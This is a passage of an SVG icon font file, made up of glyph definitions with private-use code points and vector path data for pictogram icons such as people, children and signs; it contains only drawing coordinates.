48.61-13.943 58.751-38.365l74.182-180.607zM684.715 646.254v-170.802h197.496l-69.272 170.802h-128.224zM508.044 497.381v104.803h-104.799v-104.803h-104.822v-104.822h104.822v-104.785h104.799v104.785h104.808v104.822h-104.808z" horiz-adv-x="1019" />
<glyph unicode="&#xe623;" d="M192.809 606.621c5.247 52.993-8.206 108.025-41.927 154.497-33.721 46.509-81.849 76.375-133.847 87.889-5.271-53.031 8.173-108.025 41.89-154.539 33.726-46.505 81.854-76.366 133.884-87.847zM170.951 775.671c8.654-11.962 16.134-24.618 22.514-37.718 6.413 13.152 13.826 25.827 22.438 37.718 9.867 13.605 21.065 25.949 33.235 37.152-5.276 47.529-25.133 90.598-55.268 124.522-30.243-34.099-50.167-77.475-55.305-125.263 11.835-11 22.736-23.118 32.386-36.411zM369.824 849.007c-51.993-11.514-100.121-41.375-133.847-87.889-12.722-17.55-22.552-36.364-29.578-55.787 9.476-29.479 13.482-60.576 11.552-91.886 42.682 14.478 81.5 41.757 109.983 81.019 33.721 46.519 47.165 101.513 41.89 154.544zM651 798.354c-50.374 0-91.193-40.823-91.193-91.23 0-50.336 40.818-91.197 91.193-91.197 50.369 0 91.235 40.856 91.235 91.197 0 50.407-40.861 91.23-91.235 91.23zM887.355 417.464l-46.34 132.143c-8.994 24.887-26.27 44.358-75.021 44.358h-214.082c-48.718 0-66.027-19.465-74.993-44.358l-46.34-132.143c-3.483-8.551-5.276-27.724 13.581-40.578l109.025-71.888c15.893-10.551 37.341-6.139 47.859 9.754 10.485 15.931 6.102 37.407-9.825 47.892l-86.54 57.094 24.383 67.235h33.716l-19.758-54.546 65.682-43.343c14.765-9.716 24.869-24.623 28.412-41.998 3.558-17.337 0.137-35.024-9.584-49.784-3.893-5.861-8.687-10.901-14.034-15.171h90.952c-5.342 4.275-10.131 9.31-14.034 15.171-9.726 14.761-13.133 32.447-9.584 49.784 3.553 17.38 13.652 32.273 28.408 41.998l65.682 43.343-19.782 54.546h33.716l24.411-67.235-86.545-57.094c-15.926-10.481-20.343-31.961-9.825-47.892 10.514-15.893 31.961-20.31 47.859-9.754l109.021 71.888c18.852 12.854 17.021 32.032 13.576 40.578zM848.669 218.246c0 46.34 37.548 83.784 83.784 83.784 46.231 0 83.888-37.444 83.888-83.784 0-46.198-37.652-83.812-83.888-83.812s-83.784 37.614-83.784 83.812zM34.453 50.277c-10.344 0-18.725-8.381-18.725-18.692v-25.043c0 0-1.859-35.51 34.618-35.51 27.686 0 928.966 0 928.966 0 36.685 0 34.825 34.651 34.825 34.651v75.729c0 0-3.138 24.203-31.343 24.203h-90.603c-31.031 0-56.617-55.338-115.788-55.338h-741.952zM755.198 239.628h-260.591l-108.435-16.615 5.002 107.194h-18.172l5.068-108.435-75.715-11.59 5.62 117.784h-18.309l5.587-118.883-103.051-15.799 5.413 118.477h-17.861l5.38-119.539-123.574-18.932c-0.859 0-1.689-0.208-2.558-0.278l5.21 111.3h-17.998l5.063-112.3c-20.343-4.686-35.547-22.896-35.547-44.645 0-25.411 20.513-45.962 45.82-45.962l356.3-0.038c-6.205 10.037-9.966 21.754-9.966 34.377 0 36.302 29.521 65.819 65.829 65.819h142.709l115.679 24.161 6.413-30.72-118.855-24.821h-145.946c-19.003 0-34.41-15.412-34.41-34.448 0-18.861 15.171-34.136 33.957-34.377l282.558-0.033c43.688 0.34 78.749 35.543 78.749 79.051 0 43.735-35.373 79.254-79.367 79.254z" horiz-adv-x="1033" />
<glyph unicode="&#xe624;" d="M900.431 629.394c0-64.456-52.252-116.708-116.708-116.708s-116.708 52.252-116.708 116.708c0 64.456 52.252 116.708 116.708 116.708 64.456 0 116.708-52.252 116.708-116.708zM52.668 859.827v-211.657h-31.65c-6.002 0-10.872 4.818-10.872 10.853v273.125c0 9.24 6.89 16.771 16.351 16.771h139.958c9.447 0 16.356-7.498 16.356-16.733v-16.040h216.366c6.040 0 10.877-4.851 10.877-10.82v-61.412h-184.702v16.073c0 9.24-6.908 16.738-16.389 16.738h-139.91c-9.471 0-16.384-7.626-16.384-16.898zM495.135 519.996c0-6.002-4.856-10.816-10.877-10.816h-378.163c-6.021 0-10.872 4.818-10.872 10.839v273.12c0 9.24 6.89 16.771 16.351 16.771h139.925c9.466 0 16.389-7.503 16.389-16.738v-16.040h216.366c6.026 0 10.877-4.851 10.877-10.82v-246.317zM327.392 675.503v64.408h-64.441v-64.408h-64.436v-64.455h64.436v-64.432h64.441v64.432h64.432v64.455h-64.432zM899.039 482.627c64.663 0 117.066-52.304 117.066-116.967l0.245-427.73h-392.702v354.582h-15.898l-72.411-108.044c-11.797-16.073-35.736-23.868-54.81-23.868h-170.017c-28.238 0-51.172 22.877-51.172 51.091 0 28.167 22.934 50.403 51.172 50.403h154.638l107.284 162.207c25.704 39.228 75.96 58.198 116.425 58.198l210.18 0.127z" horiz-adv-x="1029" />
<glyph unicode="&#xe625;" d="M909.186 391.016v200.33c0 28.429 23.267 51.555 51.859 51.555 28.49 0 51.537-23.127 51.537-51.555v-274.324c0-37.93-13.639-74.57-38.136-103.19l-171.059-181.659c-16.978-15.977-21.139-30.136-21.139-51.565v-33.067h-186.19l-0.206 78.689c0 29.967-2.445 70.020 35.054 109.306l217.055 217.953c7.729 7.453 17.88 11.531 28.621 11.531 22.706 0 41.18-18.432 41.18-41.096 0-9.805-3.465-19.311-9.8-26.788l-104.691-112.14c-6.785-7.954-18.264-22.944-23.968-41.315-3.077-9.539-3.956-18.839-4.129-29.509h33.698c0.136 7.598 0.701 13.714 2.52 19.372 3.292 10.595 9.861 20.125 14.804 26.245l106.267 116.633c13.363 13.471 20.681 30.916 20.681 49.246-0.005 27.54-16.557 52.869-43.957 65.349zM124.778 391.016v200.33c0 28.429-23.267 51.555-51.855 51.555-28.485 0-51.541-23.127-51.541-51.555v-274.324c0-37.93 13.644-74.57 38.14-103.19l171.069-181.659c16.968-15.977 21.13-30.136 21.13-51.565v-33.067h186.186l0.21 78.689c0 29.967 2.441 70.020-35.059 109.306l-217.055 217.953c-7.729 7.453-17.871 11.531-28.621 11.531-22.71 0-41.18-18.432-41.18-41.096 0-9.805 3.465-19.311 9.8-26.788l104.696-112.14c6.789-7.954 18.264-22.944 23.968-41.315 3.086-9.539 3.956-18.839 4.129-29.509h-33.703c-0.136 7.598-0.692 13.714-2.52 19.372-3.287 10.595-9.861 20.125-14.799 26.245l-106.267 116.624c-13.368 13.471-20.681 30.921-20.681 49.25 0 27.545 16.552 52.874 43.953 65.354zM536.576 862.033c24.431 0 44.191 19.802 44.191 44.224 0 24.352-19.774 44.191-44.191 44.191-24.389 0-44.154-19.835-44.154-44.191-0.005-24.422 19.765-44.224 44.154-44.224zM296.792 861.79c-24.772 0-44.827 19.872-44.827 44.504 0 24.562 20.050 44.472 44.827 44.472 24.772 0 44.892-19.91 44.892-44.472 0-24.632-20.125-44.504-44.892-44.504zM756.18 691.17c17.109 0 30.996 13.892 30.996 31.005 0 17.109-13.887 31.001-30.996 31.001-17.146 0-31.038-13.892-31.038-31.001 0-17.109 13.892-31.005 31.038-31.005zM801.067 675.88c-10.913 0-73.050 0-83.627 0-0.379 0-27.989 2.52-27.989 2.52l-35.022 122.085c-14.102 49.157-55.319 47.651-55.319 47.651h-113.369c0 0-41.184 1.506-55.287-47.651l-17.291-60.107-17.249 60.107c-14.172 49.157-55.287 47.651-55.287 47.651h-87.727c0 0-41.212 1.506-55.319-47.651l-35.312-123.030c-3.357-11.516 2.936-20.26 13.017-23.164 10.048-2.866 20.33 2.202 22.916 11.372l34.4 119.916 16.758 0.033-50.213-207.634h44.373v-147.484c0-12.143 9.796-22.037 21.972-22.037 12.143 0 22.079 9.894 22.079 22.037v147.484h18.605v-147.484c0-12.143 9.805-22.037 21.944-22.037 12.213 0 22.107 9.894 22.107 22.037v147.484h43.602l-49.685 207.634 16.688-0.033 34.012-118.653c0.561-2.029 1.468-3.881 2.651-5.494 3.329-5.041 9.132-7.832 15.603-7.622 6.471-0.21 12.246 2.553 15.57 7.523 1.393 1.786 2.343 3.853 2.899 6.121l33.834 118.134 15.43 0.033c0 0 0-329.681 0-350.849 0-14.336 11.727-25.927 26.030-25.927 14.313 0 25.927 11.577 25.927 25.927 0 21.167 0 199.619 0 199.619h19.175c0 0 0-178.452 0-199.619 0-14.336 11.615-25.927 25.89-25.927 14.345 0 26.105 11.577 26.105 25.927 0 21.167 0 350.849 0 350.849l16.767-0.033 32.922-119.916c1.786-5.91 6.724-9.8 12.629-11.306 0.248-0.070 0.383-0.173 0.599-0.243 5.246-1.188 29.439-8.047 47.207-13.12 0-32.366 0-204.103 0-217.607 0-10.044 8.225-18.198 18.264-18.198 10.048 0 18.203 8.15 18.203 18.198 0 14.906 0 108.712 0 108.712h14.28c0 0 0-93.811 0-108.712 0-10.044 8.15-18.198 18.194-18.198s18.301 8.15 18.301 18.198c0 14.906 0 203.262 0 203.262h13.995c0 0 0-60.182 0-68.86 0-7.561 6.121-13.649 13.569-13.649 7.495 0 13.401 6.093 13.401 13.649 0 7.453 0 67.144 0 78.343 0.037 21.929-19.278 39.74-41.222 39.74z" />
<glyph unicode="&#xe626;" d="M10.891 275.786h852.791v-136.422h-852.791v136.422zM934.931 300.515h-45.716v62.579c0 54.406-41.668 65.814-76.656 65.814h-122.736c-38.022 0-70.637 18.872-89.433 51.765-14.948 26.165-19.303 58.32-13.015 87.528-40.702 4.804-67.986 22.557-84.753 38.367-27.093 25.562-42.635 61.239-42.635 97.912 0 69.020 47.008 138.9 136.843 138.9v-45.707c-72.072 0-91.126-60.952-91.126-93.184 0-24.136 10.307-47.707 28.299-64.665 20.796-19.609 50.099-28.902 84.647-26.882 8.843 0.555 16.461-3.694 20.834-10.9 4.421-7.197 4.488-16.24 0.201-23.514-12.719-21.6-12.546-52.511 0.402-75.164 7.493-13.111 22.212-28.739 49.745-28.739h122.736c75.479 0 122.373-42.73 122.373-111.52v-62.588zM1006.104 300.515h-45.697v84.025c0 74.235-51.018 153.15-145.58 153.15h-72.589c-8.575 0-16.451 4.804-20.346 12.46-3.905 7.647-3.187 16.853 1.857 23.81 16.547 22.815 26.433 50.808 26.433 74.876 0 60.445-47.965 104.324-114.028 104.324v45.707c91.069 0 159.725-64.493 159.725-150.030 0-21.332-5.082-43.936-14.432-65.44h33.371c119.741 0 191.277-101.108 191.277-198.857v-84.025zM889.215 277.939h45.716v-138.029h-45.716v138.029zM960.675 277.939h45.697v-138.029h-45.697v138.029z" />
<glyph unicode="&#xe627;" d="M287.858 863.886c0-43.971-35.645-79.616-79.616-79.616s-79.616 35.645-79.616 79.616c0 43.971 35.645 79.616 79.616 79.616 43.971 0 79.616-35.645 79.616-79.616zM396.316 638.521v40.22c0 42.306-34.276 76.601-76.61 76.601h-223.185c-42.306 0-76.61-34.295-76.61-76.601v-40.22c-0.076-0.91-0.123-1.849-0.123-2.788v-231.604c0-17.986 14.583-32.569 32.578-32.569 17.958 0 32.578 14.573 32.578 32.569v228.153h21.836v-260.75h0.161v-368.46c0-23.96 19.465-43.416 43.416-43.416 23.998 0 43.444 19.447 43.444 43.416v368.46h28.663v-368.46c0-23.96 19.456-43.416 43.425-43.416 23.998 0 43.425 19.447 43.425 43.416v368.46h0.133v260.75h21.836v-228.153c0-17.986 14.611-32.569 32.578-32.569 17.996 0 32.569 14.573 32.569 32.569v231.604c0.009 0.958-0.038 1.887-0.114 2.788zM779.435 789.4c43.937 0 79.597 35.631 79.597 79.588 0 43.985-35.66 79.635-79.597 79.635-43.985 0-79.644-35.65-79.644-79.635 0-43.956 35.65-79.588 79.644-79.588zM1002.648 446.142l-71.424 264.922c-0.664 2.399-1.602 4.703-2.74 6.817-8.107 24.823-31.403 42.79-58.927 42.79h-180.774c-28.681 0-52.774-19.513-59.866-45.995-0.484-1.166-0.882-2.38-1.233-3.631l-70.153-264.903c-4.674-17.361 5.641-35.224 23.031-39.889 17.37-4.655 35.224 5.67 39.889 23.031l55.116 208.090h22.955l-100.020-376.5h94.217v-259.935c0-19.987 16.194-36.191 36.2-36.191 19.959 0 36.172 16.194 36.172 36.191v259.935h28.795v-259.935c0-19.987 16.204-36.191 36.21-36.191 19.968 0 36.181 16.194 36.181 36.191v259.935h94.17l-100.38 376.5h23.552l56.102-208.090c4.684-17.361 22.528-27.686 39.889-23.031 17.38 4.665 27.686 22.528 23.040 39.889zM459.937 946.953h56.159v-982.111h-56.159v982.111z" horiz-adv-x="1018" />
<glyph unicode="&#xe628;" d="M487.301 627.759c0-32.379-29.497-67.044-67.764-67.044v-546.617c0-77.615-105.766-77.615-105.766 0v546.617c-37.253 0-69.679 28.681-69.679 71.671v300.838c0 26.178 37.831 27.174 37.831-1.024v-222.369h31.678v224.417c0 24.055 36.447 25.581 36.447-1.024v-223.403h32.73v224.114c0 25.145 35.366 26.159 35.366-0.996v-223.118h32.209v224.114c0 24.889 36.949 25.875 36.949-0.996v-305.18zM769.422 863.279v-848.943c0-75.89-105.984-74.761-105.984 0v336.849h-56.424v512.095c0 119.22 162.408 119.22 162.408 0z" />
<glyph unicode="&#xe629;" d="M742.476 465.172h-115.467v135.121c45.665 35.939 75.073 91.745 75.073 154.35 0 108.487-87.899 196.381-196.339 196.381-89.112 0-171.253-66.867-188.298-140.571-3.813-16.327-8.098-59.142-8.098-59.142l-40.946-103.315c-0.816-1.836-1.227-3.95-1.227-6.163 0-8.678 6.979-15.686 15.686-15.789 4.389 8.843 14.161 14.289 24.5 12.241 12.217-2.246 20.211-14.086 17.795-26.294-1.529-8.442-7.866-14.841-15.832-17.186v-23.642c0-42.767 34.684-77.418 77.409-77.418h30.772v-28.582h-125.084c-143.756 0.109-237.851-105.491-237.851-213.388v-301.113l158.262 0.071v260.686h45.561v-260.686l505.044-0.071v260.742h46.712v-260.742l154.851 0.071 0.113 329.483c0.019 82.085-81.264 185.056-222.637 184.957zM356.89 668.962c-3.841-3.133-8.914-4.87-13.779-4.87-6.975 0-13.576 3.133-17.762 8.721-3.846 4.7-5.422 10.618-4.709 16.54 0.68 6.125 3.808 11.33 8.508 15.006 9.424 7.484 24.236 5.743 31.551-3.676 3.846-4.87 5.408-10.787 4.7-16.714-0.68-5.913-3.643-11.325-8.508-15.006zM423.955 684.653v-0.51l-4.903 0.344c-12.354 1.057-21.608 12.005-20.551 24.392 1.057 11.495 10.82 20.721 22.49 20.721l1.906-0.17c5.917-0.51 11.491-3.294 15.346-7.824 3.813-4.728 5.748-10.485 5.205-16.577-0.849-10.608-9.216-19.154-19.494-20.376zM472.885 656.268c-3.468 4.87-4.865 10.787-3.799 16.714 1.057 5.927 4.186 11.16 9.225 14.638 9.763 6.97 24.392 4.356 31.362-5.38 7.144-10.306 4.705-24.411-5.408-31.551-3.846-2.624-8.371-4.016-13.071-4.016-7.319 0-14.124 3.468-18.309 9.594zM511.74 485.345c-12.349 0-22.457 10.108-22.457 22.462 0 12.392 10.108 22.5 22.457 22.5 12.557 0 22.665-10.108 22.665-22.5 0-12.354-10.108-22.462-22.665-22.462zM511.74 567.94c-12.349 0-22.457 10.103-22.457 22.622 0 12.387 10.108 22.49 22.457 22.49 12.557 0 22.665-10.103 22.665-22.49 0-12.519-10.108-22.622-22.665-22.622zM606.505 371.488c81.953 2.85 128.75-181.154 100.531-352.954-16.596-72.897-60.086 1.902-98.299 8.348-42.291 7.14-66.112 12.071-68.117 34.231-7.343 80.259 23.42 308.819 65.885 310.376zM482.516 61.711c-2.010-22.094-25.779-27.016-68.089-34.132-38.209-6.455-83.845-85.615-98.299-8.362-28.186 171.839 18.644 355.842 100.475 352.917 42.536-1.567 73.261-230.079 65.914-310.423zM541.554 325.587c-8.362 0-16.030 4.709-20.046 12.184-5.738 11-1.383 24.567 9.598 30.333 10.783 5.578 24.902 1.052 30.489-9.598 2.751-5.205 3.299-11.292 1.354-17.054-1.737-5.743-5.545-10.485-10.967-13.265-3.119-1.751-6.795-2.6-10.429-2.6v0zM511.74 402.595c-10.448 0-19.329 7.149-21.943 17.252-1.397 5.932-0.34 12.010 2.789 17.054 3.129 5.238 8.032 8.711 13.954 10.108 11.83 2.959 24.175-4.695 27.153-16.549 2.954-12-4.53-24.227-16.549-27.186-1.727-0.34-3.667-0.68-5.403-0.68v0zM481.969 325.587c-3.506 0-7.144 0.854-10.476 2.591-10.971 5.748-15.143 19.362-9.395 30.314 5.582 10.655 19.701 15.181 30.314 9.594 5.413-2.789 9.221-7.484 11.16-13.236 1.737-5.743 1.194-11.844-1.586-17.248-3.822-7.489-11.476-12.014-20.018-12.014v0zM651.66 32.383c7.833 0 15.308 4.2 19.324 10.787 6.432 10.82 2.963 24.548-7.654 31.027-10.278 6.262-24.736 2.416-31.031-7.687-2.959-5.205-4.002-11.127-2.416-17.068 1.392-5.936 5.035-10.787 10.287-13.921 3.459-2.119 7.47-3.138 11.491-3.138v0zM675.17 110.613c12.010 0 21.943 9.556 22.452 21.57 0.547 12.557-9.221 23-22.452 23.547-12.222 0-22.122-9.594-22.651-21.608-0.17-6.092 1.902-11.84 5.922-16.2 4.195-4.356 9.768-6.975 15.855-7.314h0.873v0.005zM658.088 190.57c3.671 0 6.975 0.854 10.108 2.416 11.16 5.587 15.671 18.998 10.094 30.149-5.224 10.811-19.159 15.695-30.135 10.278-5.417-2.779-9.391-7.314-11.33-13.067-1.902-5.748-1.571-11.844 1.227-17.252 3.836-7.654 11.495-12.524 20.036-12.524v0zM604.939 252.775c7.314 0 14.119 3.478 18.474 9.556 6.979 10.094 4.525 24.232-5.578 31.362-9.735 6.979-24.392 4.36-31.338-5.408-7.149-10.282-4.733-24.392 5.38-31.541 3.841-2.61 8.367-3.969 13.062-3.969v0zM371.863 32.383c4.186 0 8.164 1.029 11.67 3.129 5.030 3.129 8.711 7.994 10.287 13.916 1.383 5.752 0.51 11.877-2.624 16.913-6.257 10.273-20.721 13.935-30.994 7.857-5.073-3.162-8.711-8.032-10.287-13.949-1.397-5.738-0.543-11.83 2.619-17.068 3.983-6.814 11.467-10.797 19.329-10.797v0zM348.519 110.613h0.854c12.382 0.51 21.943 10.957 21.603 23.51-0.51 11.995-10.108 21.608-23.51 21.608-5.922-0.363-11.505-2.779-15.686-7.319-4.006-4.356-6.092-10.103-5.922-16.228 0.547-12.010 10.448-21.57 22.66-21.57v0zM365.224 190.57c8.711 0 16.577 4.87 20.395 12.519 2.61 5.408 2.959 11.495 1.057 17.252s-5.917 10.287-11.33 13.067c-10.957 5.427-24.906 0.543-30.135-10.278-2.77-5.417-3.133-11.5-1.194-17.262 1.906-5.582 5.922-10.273 11.297-12.892 3.143-1.553 6.611-2.407 9.91-2.407v0zM418.547 252.775c4.695 0 9.221 1.359 13.067 3.992 10.103 7.135 12.557 21.268 5.408 31.546-6.979 9.763-21.608 12.382-31.371 5.408-5.026-3.506-8.187-8.716-9.221-14.633-1.052-5.936 0.17-11.877 3.638-16.743 4.356-6.097 11.165-9.57 18.479-9.57v0z" horiz-adv-x="1029" />
<glyph unicode="&#xe62a;" d="M491.111 445.215c-18.681-17.408-168.457-162.722-168.457-162.722l39.978-39.429c0 0 133.064 122.81 153.050 141.387 4.942 4.575 13.312 13.303 28.785 13.303h453.839v62.844h-469.617c-13.725-0.009-26.741-5.388-37.578-15.383zM759.991 786.827c53.215 0 82.263 36.85 82.263 82.254 0 45.39-36.855 82.207-82.263 82.207-45.418 0-82.244-36.822-82.244-82.207 0-45.404 36.822-82.254 82.244-82.254zM638.027 645.482h27.578l-40.415-145.206h269.603l-40.448 145.206h27.582l41.956-145.206h71.267l-57.274 192.672c-7.567 26.605-41.223 73.742-99.474 73.742h-156.832c-58.222 0-91.841-47.137-99.474-73.742l-57.208-192.672h71.267l41.871 145.206zM404.851 507.909l-72.394 134.999c0 0-4.251 6.426-12.138 2.616-7.088-3.424-3.889-11.414-3.889-11.414l24.022-45.836 14.937-28.555-17.225 7.76c-30.532 13.754-47.358 19.639-54.117 22.65-1.198 0.554-7.126 3.814-9.935 9.996-7.999 17.882-42.162 104.345-49.819 123.467-6.473 16.168-22.467 39.147-55.319 47.282-37.39 9.249-75.086-14.336-83.991-51.858l-51.031-215.063c-4.538-17.338-12.358-64.254-12.358-84.029 0-19.78 0.334-420.070 0.334-420.070 0.254-35.436 25.84-64.009 61.243-63.859 35.361 0.108 59.566 28.93 59.458 64.319 0 0-0.047 228.761-0.085 355.878l54.408 229.686c6.351-15.538 14.219-34.464 16.797-39.011 6.135-10.724 12.175-18.103 24.534-23.909 0 0 71.22-29.475 98.783-42.050 16.609-6.36 34.638-0.728 45.131 12.504l3.809 7.887 1.311-2.508c0 0 8.117-14.284 20.104-14.937 3.434 10.898-2.569 24.055-2.569 24.055zM294.766 869.799c0-45.432-36.841-82.282-82.286-82.282-45.441 0-82.244 36.85-82.244 82.282 0 45.427 36.817 82.254 82.244 82.254 45.432 0 82.286-36.826 82.286-82.254zM331.818 333.011l160.284 149.185-20.832 22.359-160.294-149.208z" horiz-adv-x="1019" />
<glyph unicode="&#xe62b;" d="M514.738 943.226c-177.904 0-322.706-144.811-322.706-322.682 0-177.988 144.802-322.724 322.706-322.724 177.899 0 322.668 144.736 322.668 322.724-0.009 177.871-144.769 322.682-322.668 322.682zM514.738 327.694c-161.44 0-292.897 131.391-292.897 292.841 0 161.416 131.457 292.841 292.897 292.841 161.397 0 292.817-131.424 292.817-292.841 0.005-161.444-131.42-292.841-292.817-292.841zM347.695 641.79c14.158 0 47.86 0 61.947 0 0 14.261 0 48.612 0 62.835-14.087 0-47.794 0-61.947 0 0-14.223 0-48.57 0-62.835zM515.025 874.421c-140.081 0-254.008-114.012-254.008-254.027 0-140.053 113.927-253.957 254.008-253.957 140.011 0 253.9 113.904 253.9 253.957-0.005 140.016-113.899 254.027-253.9 254.027zM325.867 619.76v106.905h106.162v-106.905h-106.162zM435.228 424.307c-29.067 0-52.619 23.533-52.619 52.628 0 29.132 23.566 52.661 52.619 52.661 29.024 0 52.548-23.529 52.548-52.661 0-29.095-23.529-52.628-52.548-52.628zM498.881 541.193c-29.062 0-52.656 23.566-52.656 52.623 0 29.062 23.594 52.656 52.656 52.656 28.987 0 52.543-23.59 52.543-52.656s-23.561-52.623-52.543-52.623zM535.74 740.577c-30.542 0-55.381 24.867-55.381 55.465 0 30.659 24.839 55.423 55.381 55.423 30.621 0 55.385-24.764 55.385-55.423 0-30.593-24.769-55.465-55.385-55.465zM627.67 458.273c-29.161 0-52.684 23.561-52.684 52.623 0 29.095 23.524 52.656 52.684 52.656 29.024 0 52.59-23.566 52.59-52.656-0.009-29.062-23.566-52.623-52.59-52.623zM638.812 612.902c-29.024 0-52.619 23.599-52.619 52.661 0 29.132 23.594 52.656 52.619 52.656 29.128 0 52.684-23.524 52.684-52.656 0.005-29.062-23.557-52.661-52.684-52.661zM116.853 391.238v203.142c0 28.813-23.59 52.266-52.586 52.266-28.883 0-52.262-23.453-52.262-52.266v-278.185c0-38.461 13.833-75.621 38.672-104.636l173.465-184.231c17.211-16.177 21.429-30.551 21.429-52.299v-33.534h188.796l0.211 79.797c0 30.41 2.48 71.008-35.553 110.864l-220.090 221.015c-7.84 7.553-18.131 11.673-29.024 11.673-23.031 0-41.759-18.667-41.759-41.655 0-9.935 3.514-19.588 9.939-27.178l106.162-113.72c6.881-8.046 18.521-23.237 24.304-41.862 3.124-9.686 4.011-19.122 4.181-29.95h-34.168c-0.141 7.732-0.709 13.913-2.555 19.663-3.335 10.747-10.005 20.405-15.012 26.615l-107.755 118.258c-13.552 13.66-20.973 31.368-20.973 49.96 0.005 27.911 16.793 53.6 44.577 66.264zM912.37 391.238v203.142c0 28.813 23.59 52.266 52.581 52.266 28.888 0 52.266-23.453 52.266-52.266v-278.185c0-38.461-13.829-75.621-38.672-104.636l-173.465-184.231c-17.215-16.177-21.429-30.551-21.429-52.299v-33.534h-188.801l-0.211 79.797c0 30.41-2.475 71.008 35.549 110.864l220.094 221.015c7.844 7.553 18.131 11.673 29.029 11.673 23.026 0 41.754-18.667 41.754-41.655 0-9.935-3.509-19.588-9.93-27.178l-106.162-113.72c-6.886-8.046-18.521-23.237-24.308-41.862-3.128-9.686-4.011-19.122-4.185-29.95h34.172c0.132 7.732 0.7 13.913 2.555 19.663 3.335 10.747 9.996 20.405 15.003 26.615l107.755 118.258c13.556 13.66 20.978 31.368 20.978 49.96-0.005 27.911-16.788 53.6-44.572 66.264z" />
<glyph unicode="&#xe62c;" d="M122.936 300.988c2.338 78.521-40.385 108.1-92.473 127.635-17.31-67.182 30.468-123.081 92.473-127.635zM134.738 651.636c33.217 71.128 5.69 115.371-34.554 153.895-42.26-54.913-20.531-125.124 34.554-153.895zM153.474 453.644c-2.296 78.488 40.376 108.17 92.511 127.64 17.244-67.144-30.496-123.039-92.511-127.64zM153.474 332.611c-2.296 78.488 40.376 108.090 92.511 127.598 17.244-67.13-30.496-123.039-92.511-127.598zM153.474 574.639c-2.296 78.516 40.376 108.203 92.511 127.705 17.244-67.21-30.496-123.081-92.511-127.705zM122.936 422.021c2.338 78.483-40.385 108.17-92.473 127.635-17.31-67.144 30.468-123.048 92.473-127.635zM122.936 543.008c2.338 78.521-40.385 108.207-92.473 127.748-17.31-67.243 30.468-123.076 92.473-127.748zM711.245-49.103h-420.981l210.509 364.731 210.472-364.731zM373.91-0.797h253.723l-126.859 219.758-126.864-219.758zM61.482 199.355l891.857 242.627-13.251 49.012-891.927-242.66zM690.812 949.849c0 0 6.532-128.659 119.303-117.746 0 0 12.723 107.492-119.303 117.746zM808.876 531.412c-11.769-16.679-31.417-27.456-53.43-27.456-17.974 0-35.569 8.444-47.441 20.284-24.281 26.502-55.768 85.726-55.768 85.726-17.646 35.831-27.106 63.539-27.106 91.557 0 59.682 48.306 111.448 108.137 111.448 29.472 0 56.077-11.802 75.617-30.884 19.545 19.082 46.117 30.884 75.589 30.884 59.827 0 108.133-51.766 108.133-111.448 0-28.017-9.464-55.726-27.101-91.557 0 0-31.487-59.224-55.768-85.726-11.877-11.839-29.472-20.284-47.45-20.284-22.032 0.014-41.643 10.792-53.412 27.456z" />
<glyph unicode="&#xe62d;" d="M658.299 812.304c0-78.278-63.457-141.735-141.735-141.735s-141.735 63.457-141.735 141.735c0 78.278 63.457 141.735 141.735 141.735 78.278 0 141.735-63.457 141.735-141.735zM516.336 374.332h-149.829v108.159l-114.556-115.324c-51.762-51.781-121.938 14.585-70.081 66.452l189.698 190.077c15.39 15.286 32.24 25.009 58.955 25.009h170.128c26.725 0 44.769-9.42 60.595-25.009l191.622-191.934c49.365-49.346-22.678-116.347-70.043-66.499l-117.56 117.835v-108.756l-148.928-0.009zM664.629 318.22l-112.585-112.623 82.638-82.496-84.685-84.704c-50.009-50 18.973-121.493 70.659-69.778l133.974 139.272c28.734 29.331 36.694 83.51 5.876 114.328-0.095 0.133-95.877 96-95.877 96zM366.545 318.22l112.604-112.623-82.647-82.496 84.685-84.704c50-50-18.954-121.493-70.659-69.778l-133.955 139.262c-28.762 29.331-36.704 83.51-5.876 114.328 0.085 0.142 95.849 96.010 95.849 96.010z" horiz-adv-x="1018" />
<glyph unicode="&#xe62e;" d="M513.343 662.866c11.061-10.433 29.068-22.142 55.943-25.339-4.144-19.272-1.285-40.487 8.598-57.759 12.404-21.707 33.918-34.149 59.006-34.149h81.012c23.088 0 50.572-7.545 50.572-43.452v-41.298h30.16v41.298c0 45.394-30.933 73.602-80.741 73.602h-81.022c-18.171 0-27.87 10.308-32.816 18.963-8.549 14.945-8.636 35.357-0.251 49.606 2.811 4.792 2.763 10.752-0.145 15.505-2.908 4.743-8.144 7.467-13.756 7.197-22.876-1.372-42.129 4.811-55.876 17.756-11.853 11.187-18.654 26.73-18.654 42.67 0 20.924 12.22 60.059 57.837 61.382v-35.434h30.16v6.134c42.602-0.86 73.332-29.493 73.332-68.782 0-15.891-6.54-34.362-17.437-49.422-3.342-4.598-3.816-10.665-1.246-15.708 2.589-5.052 7.786-8.231 13.447-8.231h47.896c62.387 0 96.043-52.069 96.043-101.077v-55.48h30.169v55.48c0 64.512-47.23 131.236-126.242 131.236h-22.016c6.173 14.191 9.525 29.107 9.525 43.192 0 55.827-44.37 98.024-103.492 98.932v38.361h-30.169v-9.032c-57.75-1.208-88.016-46.592-88.016-91.551 0.039-24.19 10.288-47.742 28.179-64.599zM768.483 446h30.16v-91.117h-30.16v91.117zM815.635 446h30.15v-91.117h-30.15v91.117zM521.38 960c-277.147 0-502.61-225.473-502.61-502.62 0-277.137 225.473-502.6 502.6-502.6 277.147 0 502.62 225.473 502.62 502.6 0.010 277.147-225.464 502.62-502.61 502.62zM911.901 457.38c0-85.494-27.687-164.584-74.482-228.97l-126.126 126.107h40.303v90.035h-130.328l-328.878 328.868c64.386 46.795 143.495 74.482 228.99 74.482 215.33 0 390.521-175.191 390.521-390.521zM130.859 457.38c0 84.519 27.059 162.787 72.878 226.777l239.597-239.606h-254.532v-90.025h344.557l214.779-214.77c-64-45.781-142.259-72.868-226.787-72.868-215.301-0.029-390.492 175.143-390.492 390.492z" />
